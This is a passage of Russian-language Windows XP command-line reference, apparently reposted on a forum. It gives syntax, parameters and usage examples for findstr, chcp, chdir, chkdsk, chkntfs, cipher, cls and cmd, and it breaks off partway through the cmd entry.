&#160; &#160; xyz\&gt; Позиция слова: конец слова</p> <p>&#160; &#160; &#160; Специальные символы в регулярных выражениях дают наилучший результат при совместном использовании. Например, при комбинации символа подстановки (.) и повторителя (*) совпадает любая строка символов:</p> <p>&#160; &#160; &#160; .*</p> <p>&#160; &#160; &#160; Используйте следующее выражение как часть более объемного выражения, которое совпадает со строкой, начинающейся с &quot;b&quot; и оканчивающейся на &quot;ing&quot;:</p> <p>&#160; &#160; &#160; b.*ing</p> <p>Примеры</p> <p>Для отделения строк поиска друг от друга следует использовать пробелы, кроме тех случаев, когда задан ключ /c. Для поиска слова &quot;hello&quot; или &quot;there&quot; в файле x.y введите следующую каманду:</p> <p>findstr &quot;hello there&quot; x.y</p> <p>Для поиска словосочетания &quot;hello there&quot; в файле x.y введите следующую каманду:</p> <p>findstr /c:&quot;hello there&quot; x.y</p> <p>Для поиска всех слов &quot;Windows&quot; (с первой заглавной буквой W) в файле Proposal.txt может быть использована следующая команда:</p> <p>findstr Windows proposal.txt</p> <p>Для поиска в каждом файле текущего каталога и в файлах всех подкаталогов слова &quot;Windows&quot; без учета строчных и заглавных букв может быть использована следующая команда:</p> <p>findstr /s /i Windows *.*</p> <p>Для поиска всех строк, содержащих слово &quot;FOR&quot;, перед которым идет несколько пробелов (чтобы найти в программе оператор цикла), с выводом номера каждой строки можно использовать команду:</p> <p>findstr /b /n /c:&quot; *FOR&quot; *.bas</p> <p>Если требуется найти несколько разных наборов символов в нескольких файлах, можно создать текстовый файл, каждая строка которого содержит образец для поиска. Также можно задать точный список файлов, если поиск будет производиться в текстовых файлах. Для использования файла Finddata.txt, содержащего образцы для поиска, файла Filelist.txt, содержащего список файлов, в которых будет производиться поиск, и записи результатов работы программы в файл Results.out служит следующая команда:</p> <p>findstr /g:finddata.txt /f:filelist.txt &gt; results.out</p> <p>Предположим, необходимо найти каждый файл в текущем каталоге и его подкаталогах, содержащий слово &quot;computer&quot; без различия строчных и заглавных букв. Для вывода списка таких файлов можно использовать следующую команду:</p> <p>findstr /s /i /m &quot;\&lt;computer\&gt;&quot; *.*</p> <p>Теперь, предположим, требуется найти не только само слово &quot;computer&quot;, но и все другие слова, начинающиеся с тех же букв, таких как &quot;compliment&quot; и &quot;compete&quot;. Введите следующую команду:</p> <p>findstr /s /i /m &quot;\&lt;comp.*&quot; *.*</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:28:31 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=23#p23 http://xhackx.bbon.ru/viewtopic.php?pid=22#p22 <p>Chcp</p> <p>Просмотр номера текущей кодовой страницы или изменение текущей кодовой страницы консоли. Выполненная без параметров команда chcp выводит номер текущей кодовой страницы для окна командной строки.<br />Синтаксис</p> <p>chcp [код]<br />Параметры</p> <p>код<br />&#160; &#160; Задает номер кодовой страницы. Поддерживаемые кодовые таблицы с соответствующими странами/регионами или языками приведены в следующей таблице.<br />Кодовая страница Страна/регион или язык<br />437 США<br />850 Многоязыковый (латиница I)<br />852 Восточная и центральная Европа (латиница II)<br />855 Кириллица (русский)<br />857 Турецкий<br />860 Португальский<br />861 Исландский<br />863 Французский (Канада)<br />865 Скандинавский<br />866 Русский<br />869 Современный греческий<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Только кодовая страница изготовителя вычислительной техники (ИВТ), установленная в системе Windows XP, отображается правильно в окне командной строки при использовании растрового шрифта. Прочие кодовые страницы будут правильно отображаться только в полноэкранном режиме или в окне командной строки, использующем шрифты TrueType.<br />&#160; &#160; * Подготовка кодовых страниц, в отличие от MS-DOS, не требуется.<br />&#160; &#160; * В программах, запущенных после назначения новой кодовой страницы, используется эта кодовая страница, а в программах, запущенных до назначения новой кодовой страницы, — исходная.</p> <p>Примеры</p> <p>Чтобы просмотреть номера текущей кодовой страницы, введите следующую команду:</p> <p>chcp</p> <p>Отобразится сообщение следующего вида:</p> <p>Текущая кодовая страница: 437</p> <p>Чтобы заменить текущую кодовую страницу страницей 850 (многоязычная латиница 1), введите следующую команду:</p> <p>chcp 850</p> <p>Если введено неверное значение номера кодовой страницы, на экран выводится следующее сообщение об ошибке:</p> <p>Указана недопустимая кодовая страница</p> <p>========================================================================================<br />Chdir (Cd)</p> <p>Вывод имени текущего каталога или переход в другую папку. При использовании только с именем диска (например chdir C:) команда chdir выводит имена текущих диска и папки. Выполненная без параметров команда chdir выводит текущие диск и каталог.<br />Синтаксис</p> <p>chdir [[/d] [диск:][путь] [..]] [[/d] [диск:][путь] [..]]</p> <p>cd [[/d] [диск:][путь] [..]] [[/d] [диск:][путь] [..]]<br />Параметры</p> <p>/d<br />&#160; &#160; Смена текущего диска или текущего каталога на диске.<br />[диск:][путь]<br />&#160; &#160; Задание имени диска (если он отличается от текущего) и каталога, в который требуется перейти.<br />[..]<br />&#160; &#160; Переход в родительскую папку.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Работа с расширениями командного процессора</p> <p>&#160; &#160; &#160; Если расширения командного процессора разрешены (задано по умолчанию), имена папок в пути к текущему каталогу отображаются точно так же, как на жестком диске, в том же формате имен папок с учетом регистра. Например, если имя папки на жестком диске — C:\Temp, команда CD C:\TEMP задает текущий каталог C:\Temp, соответствующий формату имени этой папки на жестком диске.</p> <p>&#160; &#160; &#160; Чтобы запретить расширения командного процессора для определенного процесса, введите следующую команду:</p> <p>&#160; &#160; &#160; cmd e:off</p> <p>&#160; &#160; &#160; Если расширения командного процессора запрещены, в команде chdir нельзя использовать пробелы в качестве разделителей. Таким образом, можно перейти в подкаталог, имя которого содержит пробел, не заключая параметр [путь] в кавычки. Например, следующий путь позволяет перейти в подкаталог \Start menu.</p> <p>&#160; &#160; &#160; cd \winnt\profiles\username\programs\start menu</p> <p>&#160; &#160; &#160; Для получения дополнительных сведений о разрешении и запрещении расширений командного процессора щелкните ссылку «» и см. раздел, посвященный команде cmd.<br />&#160; &#160; * Переход в корневой каталог</p> <p>&#160; &#160; &#160; Корневой каталог является вершиной дерева каталогов на диске. Чтобы перейти в корневой каталог, введите следующую команду:</p> <p>&#160; &#160; &#160; cd\<br />&#160; &#160; * Переход из основного каталога одного диска в основной каталог другого</p> <p>&#160; &#160; &#160; Чтобы перейти в основной каталог диска отличного от текущего, введите следующую команду:</p> <p>&#160; &#160; &#160; chdir [диск:\[каталог]]</p> <p>&#160; &#160; &#160; cd [диск:\[каталог]]</p> <p>&#160; &#160; &#160; Чтобы проверить переход к этому каталогу, введите одну из следующих команд:</p> <p>&#160; &#160; &#160; chdir [диск:]</p> <p>&#160; &#160; &#160; cd [диск:]<br />&#160; &#160; * Команда chdir с другими параметрами доступна в консоли восстановления.</p> <p>Примеры</p> <p>Используемая с именем диска команда chdir позволяет перейти в текущий каталог этого диска. Например, если ввести команду cd c: в приглашении каталога C:\Temp, отобразится следующая строка:</p> <p>C:\Temp</p> <p>Чтобы перейти в текущий каталог Reports, введите одну из следующих команд:</p> <p>chdir \reports</p> <p>cd \reports</p> <p>Чтобы перейти из текущего каталога в подкаталог \Specials\Sponsors, введите следующую команду:</p> <p>cd \specials\sponsors</p> <p>Или, если текущим каталогом является \Specials, введите следующую команду, чтобы перейти в подкаталог \Specials\Sponsors:</p> <p>cd sponsors</p> <p>Чтобы перейти из подкаталога в родительский каталог, введите следующую команду:</p> <p>cd ..</p> <p>Для вывода на экран имени текущего каталога можно использовать команду chdir или cd без параметров. Например, если текущим каталогом является \Public\Jones на диске B, вызов команды chdir приведет к следующему результату:</p> <p>B:\Public\Jones</p> <p>Если при работе на диске D требуется скопировать все файлы каталогов \Public\Jones и \Public\Lewis на диске C в корневой каталог диска D, введите следующую последовательность команд:</p> <p>chdir c:\public\jones</p> <p>copy c:*.* d:\</p> <p>chdir c:\public\lewis</p> <p>copy c:*.* d:\</p> <p>Если требуется скопировать все файлы каталогов \Public\Jones и \Public\Lewis в текущий каталог диска D, введите следующие команды:</p> <p>chdir c:\public\jones</p> <p>copy c:*.* d:</p> <p>chdir c:\public\lewis</p> <p>copy c:*.* d:</p> <p>========================================================================================<br />Chkdsk</p> <p>Вывод на экран отчета о состоянии диска в форме, зависящей от используемой файловой системы. Команда chkdsk также составляет список ошибок на диске и исправляет их. Выполненная без параметров команда chkdsk выводит информацию о состоянии текущего диска.<br />Синтаксис</p> <p>chkdsk [том:][[путь] имя_файла] [/f] [/v] [/r] [/x] [/i] [/c] [/l[:размер]]<br />Параметры</p> <p>том:<br />&#160; &#160; Указывает букву диска (с последующим двоеточием), точку подключения или имя тома.<br />[путь] имя_файла<br />&#160; &#160; Задает местонахождение и имя файла или имена множества файлов, для которых команда chkdsk проверит степень фрагментации. Для задания нескольких файлов можно использовать подстановочные знаки (* и ?).<br />/f<br />&#160; &#160; Задает исправление ошибок на диске. Диск должен быть заблокирован. Если диск не заблокирован командой chkdsk, отображается запрос на проверку диска при следующей перезагрузке компьютера.<br />/v<br />&#160; &#160; Выводит на экран имена проверяемых файлов и каталогов.<br />/r<br />&#160; &#160; Обнаруживает поврежденные сектора и восстанавливает ту часть данных, которая еще может быть прочитана. Диск должен быть заблокирован.<br />/x<br />&#160; &#160; Используйте только с файловой системой NTFS. При необходимости инициирует операцию отключения тома в качестве первого действия. Все открытые дескрипторы диска будут неверны. Параметр /x включает также функциональные возможности параметра /f.<br />/i<br />&#160; &#160; Используйте только с файловой системой NTFS. Выполняет менее тщательную проверку записей индекса, что уменьшает время, необходимое для работы команды chkdsk.<br />/c<br />&#160; &#160; Используйте только с файловой системой NTFS. Пропускает проверку циклов в структуре папок, что уменьшает время, необходимое для работы команды chkdsk.<br />/l[:размер]<br />&#160; &#160; Используйте только с файловой системой NTFS. Устанавливает указанный размер журнала. Если размер не указан, параметр /l выводит текущий размер.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Выполнение команды chkdsk</p> <p>&#160; &#160; &#160; Чтобы выполнить команду chkdsk для жестких дисков, необходимо быть членом группы администраторов.<br />&#160; &#160; * Проверка заблокированных дисков при перезагрузке</p> <p>&#160; &#160; &#160; Если требуется исправить ошибки на диске с помощью команды chkdsk, нельзя открывать файлы на этом диске. В противном случае выводится следующее сообщение о ошибке:</p> <p>&#160; &#160; &#160; Невозможно выполнить команду Chkdsk, так как указанный том используется другим процессом. Следует ли выполнить проверку этого тома при следующей перезагрузке системы? [Y(да)/N(нет)]</p> <p>&#160; &#160; &#160; Если пользователь выберет эту возможность, команда chkdsk проверит диск и автоматически исправит ошибки при перезагрузке компьютера. Если проверяемый раздел диска является загрузочным, команда chkdsk автоматически перезагрузит компьютер после проверки этого диска.<br />&#160; &#160; * Отчет об ошибках</p> <p>&#160; &#160; &#160; Команда chkdsk выполняет проверку дискового пространства и его использования для файловых систем таблица размещения файлов (FAT) и NTFS. Команда Chkdsk позволяет получить отчет о состоянии со сведениями по каждой файловой системе. Отчет о состоянии диска включает перечень найденных ошибок. Если команда chkdsk запущена без параметра /f в активном разделе, может быть получено сообщение о наличии серьезных ошибок, так как диск нельзя заблокировать. Для поиска ошибок команду chkdsk нужно запускать время от времени на каждом диске.<br />&#160; &#160; * Исправление ошибок</p> <p>&#160; &#160; &#160; Если указан параметр командной строки /f, программа chkdsk исправляет ошибки на диске. При работе chkdsk должна обеспечиваться возможность блокирования диска для исправления ошибок. Поскольку при исправлении ошибок обычно изменяется таблица размещения файлов и иногда происходит потеря данных, программа chkdsk запрашивает подтверждение в следующем виде:</p> <p>&#160; &#160; &#160; Потерянных кластеров: 10; цепочек: 3.</p> <p>&#160; &#160; &#160; Преобразовать потерянные цепочки кластеров в файлы [Y(да)/N(нет)]?</p> <p>&#160; &#160; &#160; Если ввести Y, Windows сохраняет каждую потерянную цепочку в корневом каталоге как файл с именем формата Filennnn.chk. После завершения выполнения chkdsk можно проверить эти файлы на наличие нужных сведений. Если ввести N, Windows исправляет ошибки на диске без сохранения данных из потерянных блоков.</p> <p>&#160; &#160; &#160; Если параметр командной строки /f не используется, программа chkdsk только выдает сообщение о наличие ошибок в файле, но не исправляет их.</p> <p>&#160; &#160; &#160; Если команда chkdsk /f запущена на диске большого объема (например 70 Гб) или диск содержит большое количество файлов (например несколько миллионов), для завершения работы программы chkdsk может потребоваться очень много времени (возможно несколько дней). В течение всего этого времени компьютер будет недоступен для пользователей, так как chkdsk не возвращает управления до завершения работы.<br />&#160; &#160; * Проверка дисков с файловой системой FAT</p> <p>&#160; &#160; &#160; Система Windows выводит отчет программы chkdsk о состоянии диска с файловой системой FAT в следующем формате:</p> <p>&#160; &#160; &#160; Серийный номер тома: B1AF-AFBF</p> <p>&#160; &#160; &#160; 72214528 байт всего на диске</p> <p>&#160; &#160; &#160; 73728 байт в 3 скрытых файлах</p> <p>&#160; &#160; &#160; 30720 байт в 12 каталогах</p> <p>&#160; &#160; &#160; 11493376 байт в 386 пользовательских файлах</p> <p>&#160; &#160; &#160; 61440 байт в поврежденных секторах</p> <p>&#160; &#160; &#160; 60555264 байт доступно на диске</p> <p>&#160; &#160; &#160; 2048 байт в каждом кластере</p> <p>&#160; &#160; &#160; Всего кластеров на диске: 35261.</p> <p>&#160; &#160; &#160; 29568 кластеров на диске<br />&#160; &#160; * Проверка дисков с файловой системой NTFS</p> <p>&#160; &#160; &#160; Система Windows выводит отчет программы chkdsk о состоянии диска с файловой системой NTFS в следующем формате:</p> <p>&#160; &#160; &#160; Тип файловой системы: NTFS.</p> <p>&#160; &#160; &#160; Проверка файлов...</p> <p>&#160; &#160; &#160; Проверка файлов завершена.</p> <p>&#160; &#160; &#160; Проверка индексов...</p> <p>&#160; &#160; &#160; Проверка индесков завершена.</p> <p>&#160; &#160; &#160; Проверка описателей защиты...</p> <p>&#160; &#160; &#160; Проверка описателей защиты завершена.</p> <p>&#160; &#160; &#160; 12372 Кбайт всего на диске.</p> <p>&#160; &#160; &#160; 3 Кбайт в 1 пользовательских файлах.</p> <p>&#160; &#160; &#160; 2 КБ в 1 индексах.</p> <p>&#160; &#160; &#160; 4217 КБ используется системой.</p> <p>&#160; &#160; &#160; 8150 Кбайт свободно на диске.</p> <p>&#160; &#160; &#160; Размер кластера: 512 байт.</p> <p>&#160; &#160; &#160; Всего кластеров на диске: 24745.</p> <p>&#160; &#160; &#160; 16301 кластеров на диске.<br />&#160; &#160; * Использование chkdsk с открытыми файлами</p> <p>&#160; &#160; &#160; Если указан параметр /f, команда chkdsk выводит сообщение об ошибке, если на диске найдены открытые файлы. Если же параметр /f не указан и на диске найдены открытые файлы, chkdsk может выводить сообщения о потерянных блоках на диске. Это произойдет в случае, когда открытые файлы еще не записаны в таблице размещения файлов. Если программа chkdsk сообщает о большом количестве потерянных блоков дискового пространства, должна быть рассмотрена возможность ремонта диска.<br />&#160; &#160; * Обнаружение физических ошибок диска</p> <p>&#160; &#160; &#160; Используйте параметр командной строки /r для обнаружения физических ошибок диска в файловой системе. Для получения сведений о восстановлении физически поврежденных файлов с помощью команды recover щелкните ссылку «».<br />&#160; &#160; * Отчет о поврежденных секторах диска</p> <p>&#160; &#160; &#160; Испорченные сектора, о которых сообщает команда chkdsk, были маркированы при первом форматировании диска. Такие сектора не представляют опасности.<br />&#160; &#160; * Общие сведения о кодах завершения программы</p> <p>&#160; &#160; &#160; В следующей таблице перечислены коды завершения, которые могут содержатся в отчете программы chkdsk после окончания ее выполнения.<br />&#160; &#160; &#160; Код выхода Описание<br />&#160; &#160; &#160; 0 Не найдено ни одной ошибки.<br />&#160; &#160; &#160; 1 Ошибки найдены и исправлены.<br />&#160; &#160; &#160; 2 Была выполнена очистка диска, например удалены ненужные файлы, или очистка не была выполнена из-за отсутствия ключа /f.<br />&#160; &#160; &#160; 3 Диск не может быть проверен, ошибки не могут быть исправлены или ошибки не были исправлены, так как не был задан ключ /f.<br />&#160; &#160; * Команда chkdsk с другими параметрами доступна в консоли восстановления.</p> <p>Примеры</p> <p>Если требуется проверить диск в дисководе D и исправить все обнаруженные ошибки в Windows, введите следующую команду:</p> <p>chkdsk d: /f</p> <p>Если обнаружена ошибка, выполнение программы сhkdsk приостанавливается и выводятся соответствующие сообщения. По окончании выполнения команды chkdsk на экран выводится отчет, содержащий сведения о текущем состоянии диска. До завершения работы chkdsk нельзя открывать какие-либо файлы на указанном диске.</p> <p>Чтобы проверить фрагментацию всех файлов в текущем каталоге на диске с файловой системой FAT, введите следующую команду:</p> <p>chkdsk *.*</p> <p>Chkdsk выведет отчет о состоянии диска, а затем список фрагментированных файлов, удовлетворяющих шаблону команды.</p> <p>========================================================================================<br />Chkntfs</p> <p>Просмотр или задание планирования автоматической проверки системы для томов файловых систем FAT, FAT32 или NTFS при запуске компьютера.<br />Синтаксис</p> <p>chkntfs том: [...]</p> <p>chkntfs [/d]</p> <p>chkntfs [/t[:время]]</p> <p>chkntfs [/x том: [...]]</p> <p>chkntfs [/c том: [...]]<br />Параметры</p> <p>том: [...]<br />&#160; &#160; Обязательный параметр. Указание буквы диска (с последующим двоеточием), точки подключения или имени тома. Выводит сообщение, в котором указана файловая система заданного тома. Если выполняется запланированная автоматическая проверка файлов, данный параметр позволяет вывести сообщение о повреждении тома. В этом случае необходимо запустить команду chkdsk.<br />/d<br />&#160; &#160; Восстановление всех параметров chkntfs по умолчанию, за исключением времени, оставшегося до автоматической проверки файлов. По умолчанию при запуске компьютера проверяются все тома.<br />/t[:время]<br />&#160; &#160; Изменение инициализации обратного времени отсчета в Autochk.exe на указанное значение времени в секундах. Если параметр :время не задан, параметр /t выводит текущее время обратного отсчета.<br />/x том: [...]<br />&#160; &#160; Исключение указанного тома из проверки при запуске компьютера, даже если помечено, что для него требуется запуск chkdsk.<br />/c том: [...]<br />&#160; &#160; Планирование проверки указанного тома при запуске компьютера.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Чтобы выполнить команду chkntfs, необходимо быть членом локальной группы администраторов.<br />&#160; &#160; * Хотя инициализацию времени обратного отсчета в Autochk.exe можно установить в ноль, это не позволит отменить автоматическую проверку файлов, которая является потенциально длительной процедурой.</p> <p>Примеры</p> <p>Чтобы вывести инициализацию времени обратного отсчета файла Autochk.exe, введите следующую команду:</p> <p>chkntfs /t</p> <p>При изменении инициализации времени обратного отсчета в Autochk.exe введите время в секундах. Например, чтобы установить время обратного отсчета в 30 секунд, введите следующую команду:</p> <p>chkntfs /t:30</p> <p>Параметр командной строки /x не обладает свойством накопления. Если он вводится несколько раз, самая последняя запись переопределяет предыдущие данные. Чтобы исключить несколько томов, перечислите их в одной команде. Например, чтобы исключить тома E: и F:, введите следующую команду:</p> <p>chkntfs /x e: f:</p> <p>Чтобы исключить только том F:, введите следующую команду:</p> <p>chkntfs /x e:</p> <p>chkntfs /x f:</p> <p>Параметр командной строки /c обладает свойством накопления. Если требуется проверять только указанный том, восстановите параметры по умолчанию для сброса всех предыдущих команд, исключите проверку всех томов, а затем запланируйте автоматическую проверку файлов для нужного тома.</p> <p>Например, чтобы запланировать автоматическую проверку файлов только на диске D:, введите следующие команды:</p> <p>chkntfs /d</p> <p>chkntfs /x c: d: e:</p> <p>chkntfs /c d:</p> <p>========================================================================================<br />Cipher</p> <p>Отображение или изменение шифрование папок и файлов на томах NTFS. Использованная без параметров команда cipher отображает состояние шифрования текущей папки и всех файлов, находящихся в ней.<br />Синтаксис</p> <p>cipher [{/e|/d}] [/s:каталог] [/a] [/i] [/f] [/q] [/h] [/k] [/u[/n]] [путь [...]] | [/r:имя_файла_без_расширения] | [/w:путь]<br />Параметры</p> <p>/e<br />&#160; &#160; Шифрует указанные папки. Папки помечаются таким образом, чтобы файлы, которые будут добавляться в папку позже, также шифровались.<br />/d<br />&#160; &#160; Расшифровывает указанные папки. Папки помечаются таким образом, чтобы файлы, которые будут добавляться в папку позже, также шифровались.<br />/s: каталог<br />&#160; &#160; Выполняет выбранную операцию над указанной папкой и всеми подпапками в ней.<br />/a<br />&#160; &#160; Выполняет операцию над файлами и каталогами.<br />/i<br />&#160; &#160; Продолжение выполнения указанной операции даже после возникновения ошибок. По умолчанию выполнение cipher прекращается после возникновения ошибки.<br />/f<br />&#160; &#160; Выполнение шифрования или расшифровывания указанных объектов. По умолчанию уже зашифрованные или расшифрованные файлы пропускаются командой cipher.<br />/q<br />&#160; &#160; Включение в отчет только наиболее важных сведений.<br />/h<br />&#160; &#160; Отображение файлов с атрибутами «Скрытый» и «Системный». По умолчанию эти файлы не шифруются и не расшифровываются.<br />/k<br />&#160; &#160; Создание ключа шифрования файла для пользователя, выполнившего команду cipher. Если используется данный параметр, все остальные параметры команды cipher не учитываются.<br />/u<br />&#160; &#160; Обновление ключа шифрования файла пользователя или ключа агента восстановления на текущие ключи во всех зашифрованных файлах на локальном диске (если эти ключи были изменены). Этот параметр используется только вместе с параметром /n.<br />/n<br />&#160; &#160; Запрещение обновления ключей. Данный параметр служит для поиска всех зашифрованных файлов на локальных дисках. Этот параметр используется только вместе с параметром /u. <br />путь<br />&#160; &#160; Указывает шаблон, файл или папку.<br />/r:имя_файла_без_расширения<br />&#160; &#160; Создание нового сертификата агента восстановления и закрытого ключа с последующей их записью в файлах с именем, указанным в параметре имя_файла_без_расширения. Если используется данный параметр, все остальные параметры команды cipher не учитываются.<br />/w:путь<br />&#160; &#160; Удаление данных из неиспользуемых разделов тома. Параметр путь может указывать на любой каталог нужного тома. Если используется данный параметр, все остальные параметры команды cipher не учитываются.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Использование параметра /w</p> <p>&#160; &#160; &#160; Параметр /w удаляет данные из доступных разделов тома и не применим к файлам или каталогам. При использовании данного параметра диск не блокируется, поэтому другие программы могут обращаться к разделам на диске, которые в этом случае не могут быть стерты cipher. Поскольку данный параметр выполняет запись в большую часть дискового тома, для завершения работы программы может потребоваться много времени, а поэтому его следует использовать только при необходимости.<br />&#160; &#160; * Шифрование и расшифровывание файлов</p> <p>&#160; &#160; &#160; Чтобы предотвратить расшифровывание зашифрованного файла при изменении, рекомендуется зашифровать и файл, и папку, в которой он находится.<br />&#160; &#160; * Использование файлов и папок, доступных только для чтения</p> <p>&#160; &#160; &#160; С помощью команды cipher нельзя зашифровать файлы, доступные только для чтения.<br />&#160; &#160; * Использованиее нескольких имен папок</p> <p>&#160; &#160; &#160; Имеется возможность использовать несколько имен папок и подстановочные знаки.<br />&#160; &#160; * Использование нескольких параметров</p> <p>&#160; &#160; &#160; Параметры должны быть разделены между собой по крайней мере одним пробелом.</p> <p>Примеры</p> <p>Чтобы зашифровать подпапку May в папке MonthlyReports с помощью команды cipher, введите следующую команду:</p> <p>cipher /e monthlyreports\may</p> <p>Чтобы зашифровать папку MonthlyReports, подпапки с January по December и подпапки Manufacturing в подпапках месяцев, введите:</p> <p>cipher /e /s:monthlyreports</p> <p>Чтобы зашифровать только файл Marketing.xls в подпапке May, введите:</p> <p>cipher /e /a monthlyreports\may\marketing.xls</p> <p>Чтобы зашифровать файл Marketing.xls, файл Maintenance.doc и подпапку Manufacturing (расположенные в папке May), введите:</p> <p>cipher /e /a monthlyreports\may\ma*</p> <p>Чтобы определить, зашифрована ли папка May, введите:</p> <p>cipher monthlyreports\may</p> <p>Чтобы определить, какие файлы зашифрованы в папке May, введите:</p> <p>cipher monthlyreports\may\*</p> <p>========================================================================================<br />Cls</p> <p>Очистка окна командной строки.<br />Синтаксис</p> <p>cls<br />Параметры</p> <p>/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Примеры</p> <p>Чтобы очистить окно командной строки от сведений, которые в нем отображаются, и восстановить пустое окно, введите следующую команду:</p> <p>cls</p> <p>========================================================================================<br />Cmd</p> <p>Запуск нового экземпляра программы командного процессора Cmd.exe. Выполненная без параметров команда cmd выводит сведения о версии Windows XP и авторских правах.<br />Синтаксис</p> <p>cmd [[{/c|/k}] [/s] [/q] [/d] [{/a|/u}] [/t:тф] [/e:{on|off}] [/f:{on|off}] [/v:{on|off}] команда]<br />Параметры</p> <p>/c<br />&#160; &#160; Выполнение команды, заданной параметром команда, с завершением работы.<br />/k<br />&#160; &#160; Выполнение команды, заданной параметром команда, с продолжением работы.<br />/s<br />&#160; &#160; Изменение обработки команды после параметров /c или /k.<br />/q<br />&#160; &#160; Выключение режима вывода команд на экран.<br />/d<br />&#160; &#160; Отключение выполнения команд AutoRun.<br />/a<br />&#160; &#160; Вывод сведений в формате ANSI (American National Standards Institute).<br />/u<br />&#160; &#160; Вывод сведений в кодировке Юникод.<br />/t:тф<br />&#160; &#160; Изменение цвета текста т и фона ф. В следующей таблице перечислены допустимые шестнадцатеричные числа, которые можно задать в качестве значений параметров т и ф.<br />&#160; &#160; Значение Цвет<br />&#160; &#160; 0 Черный<br />&#160; &#160; 1 Синий<br />&#160; &#160; 2 Зеленый<br />&#160; &#160; 3 Голубой<br />&#160; &#160; 4 Красный<br />&#160; &#160; 5 Сиреневый<br />&#160; &#160; 6 Желтый<br />&#160; &#160; 7 Белый<br />&#160; &#160; 8 Серый<br />&#160; &#160; 9 Светло-синий<br />&#160; &#160; A Светло-зеленый<br />&#160; &#160; B Светло-голубой<br />&#160; &#160; C Светло-красный<br />&#160; &#160; D Светло-сиреневый<br />&#160; &#160; E Светло-желтый<br />&#160; &#160; F Яркий белый<br />/e:on<br />&#160; &#160; Включение расширений командного процессора.<br />/e:off<br />&#160; &#160; Отключение расширений командного процессора.<br />/f:on<br />&#160; &#160; Включение завершения имен файлов и папок.<br />/f:off<br />&#160; &#160; Отключение завершения имен файлов и папок.<br />/v:on<br />&#160; &#160; Включение отложенного расширения переменных среды.<br />/v:off<br />&#160; &#160; Отключение отложенного расширения переменных среды.<br />строка<br />&#160; &#160; Задание команды для выполнения.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Использование нескольких команд</p> <p>&#160; &#160; &#160; В параметре строка можно указать несколько команд, используя разделитель команд &amp;&amp;. Однако в этом случае необходимо заключить все эти команды в кавычки (например &quot;команда&amp;&amp;команда&amp;&amp;команда&quot;).<br />&#160; &#160; * Обработка кавычек</p> <p>&#160; &#160; &#160; Если указан параметр /c или /k, команда cmd обрабатывает остаток строки и кавычки сохраняются только при выполнении следующих условий:<br />&#160; &#160; &#160; &#160; &#160; o параметр /s не используется;<br />&#160; &#160; &#160; &#160; &#160; o используется только одна пара кавычек;<br />&#160; &#160; &#160; &#160; &#160; o текст в кавычках не содержит никаких специальных символов (например: &amp;&lt;&gt;( ) @ ^ |);<br />&#160; &#160; &#160; &#160; &#160; o текст в кавычках не содержит одного или нескольких пробелов;<br />&#160; &#160; &#160; &#160; &#160; o строка в кавычках является именем исполняемого файла.</p> <p>&#160; &#160; &#160; Если эти условия выполняются, строка обрабатывается, т. е. проверяется, является ли первый символ открывающей кавычкой. Если первый символ является открывающей кавычкой, он связывается с закрывающей кавычкой. Текст, следующий за закрывающей кавычкой, сохраняется.<br />&#160; &#160; * Выполнение подразделов реестра</p> <p>&#160; &#160; &#160; Если в строке не указан параметр /d, программа Cmd.exe выполняет поиск следующих подразделов реестра:</p> <p>&#160; &#160; &#160; HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ</p> <p>&#160; &#160; &#160; HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun REG_EXPAND_SZ</p> <p>&#160; &#160; &#160; Если присутствуют один или оба подраздела реестра, они выполняются перед всеми другими переменными.</p> <p>&#160; &#160; &#160; Внимание!<br />&#160; &#160; &#160; &#160; &#160; o Ошибка при изменении реестра может серьезно повредить систему. Перед изменением реестра создайте резервную копию всех важных данных.<br />&#160; &#160; * Разрешение и запрещение расширений командного процессора</p> <p>&#160; &#160; &#160; В Windows XP расширения командного процессора разрешены по умолчанию. Эти расширения можно запретить в определенном процессе с помощью параметра /e:off. В компьютере или сеансе пользователя можно разрешить или запретить расширения для всех параметров команды cmd, задав следующие значения REG_DWORD:</p> <p>&#160; &#160; &#160; HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD</p> <p>&#160; &#160; &#160; HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD</p> <p>&#160; &#160; &#160; Установите в реестре значение REG_DWORD в 0&#215;1 (т. е. разрешить) или 0&#215;0 (т. е. запретить) с помощью программы Regedit.exe. Пользовательские настройки имеют приоритет над настройками компьютера, а параметры командной строки имеют приоритет над параметрами реестра.</p> <p>&#160; &#160; &#160; Внимание!<br />&#160; &#160; &#160; &#160; &#160; o Ошибка при изменении реестра может серьезно повредить систему. Перед изменением реестра создайте резервную копию всех важных данных.</p> <p>&#160; &#160; &#160; Если расширения командного процессора разрешены, вступают в силу следующие команды.<br />&#160; &#160; &#160; &#160; &#160; o assoc<br />&#160; &#160; &#160; &#160; &#160; o call<br />&#160; &#160; &#160; &#160; &#160; o chdir (cd)<br />&#160; &#160; &#160; &#160; &#160; o color<br />&#160; &#160; &#160; &#160; &#160; o del (erase)<br />&#160; &#160; &#160; &#160; &#160; o endlocal<br />&#160; &#160; &#160; &#160; &#160; o for<br />&#160; &#160; &#160; &#160; &#160; o ftype<br />&#160; &#160; &#160; &#160; &#160; o goto<br />&#160; &#160; &#160; &#160; &#160; o if<br />&#160; &#160; &#160; &#160; &#160; o mkdir (md)<br />&#160; &#160; &#160; &#160; &#160; o popd<br />&#160; &#160; &#160; &#160; &#160; o prompt<br />&#160; &#160; &#160; &#160; &#160; o pushd<br />&#160; &#160; &#160; &#160; &#160; o set<br />&#160; &#160; &#160; &#160; &#160; o setlocal<br />&#160; &#160; &#160; &#160; &#160; o shift<br />&#160; &#160; &#160; &#160; &#160; o start (также вносит изменения во 